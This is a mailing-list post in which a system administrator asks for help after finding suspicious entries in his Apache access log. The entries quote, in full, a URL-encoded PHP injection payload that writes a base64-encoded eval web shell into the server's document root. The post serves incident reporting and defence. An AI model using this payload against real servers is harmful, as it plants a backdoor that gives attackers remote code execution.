users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
[users@httpd] am i hacked ?
Hi, just in the moment i found two very weird entries in may access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 What upsets me is that these two requests have statuscode 200, which mean it was successfull. The IP is from ukraine. Where can i find out what these %charcacters mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit. Thanks for any hint. Bernd -- Bernd Lentes Systemadministration institute of developmental genetics Gebäude 35.34 - Raum 208 HelmholtzZentrum München bernd.len...@helmholtz-muenchen.de phone: +49 (0)89 3187 1241 fax: +49 (0)89 3187 2294 Erst wenn man sich auf etwas festlegt kann man Unrecht haben Scott Adams Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org